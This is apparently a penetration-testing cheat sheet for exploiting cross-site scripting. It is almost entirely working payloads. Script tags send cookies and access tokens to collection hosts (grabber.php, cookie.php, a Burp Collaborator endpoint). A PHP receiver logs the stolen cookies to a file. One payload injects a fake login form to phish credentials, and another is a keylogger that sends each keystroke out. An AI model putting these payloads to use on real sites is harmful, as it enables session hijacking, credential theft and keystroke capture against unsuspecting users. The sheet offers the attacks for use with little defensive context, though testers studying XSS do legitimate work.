Methodology

<script>document.location='<http://localhost/XSS/grabber.php?c='+document.cookie></script>
<script>document.location='<http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token>')</script>
<script>new Image().src="<http://localhost/cookie.php?c=>"+document.cookie;</script>
<script>new Image().src="<http://localhost/cookie.php?c=>"+localStorage.getItem('access_token');</script>

Write the collected data into a file.

<?php
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie."\r\n");
fclose($fp);
?>

CORS

<script>
  fetch('https://<SESSION>.burpcollaborator.net', {
  method: 'POST',
  mode: 'no-cors',
  body: document.cookie
  });
</script>

UI Redressing

Leverage the XSS to modify the HTML content of the page in order to display a fake login form.

<script>
history.replaceState(null, null, '../../../login');
document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>"
</script>

Javascript Keylogger

Another way to collect sensitive data is to set a javascript keylogger.

<img src=x onerror='document.onkeypress=function(e){fetch("<http://domain.com?k=>"+String.fromCharCode(e.which))},this.remove();'>

Other Ways

More exploits at http://www.xss-payloads.com/payloads-list.html?a#category=all:

• Taking screenshots using XSS and the HTML5 Canvas
• JavaScript Port Scanner
• Network Scanner
• .NET Shell execution
• Redirect Form
• Play Music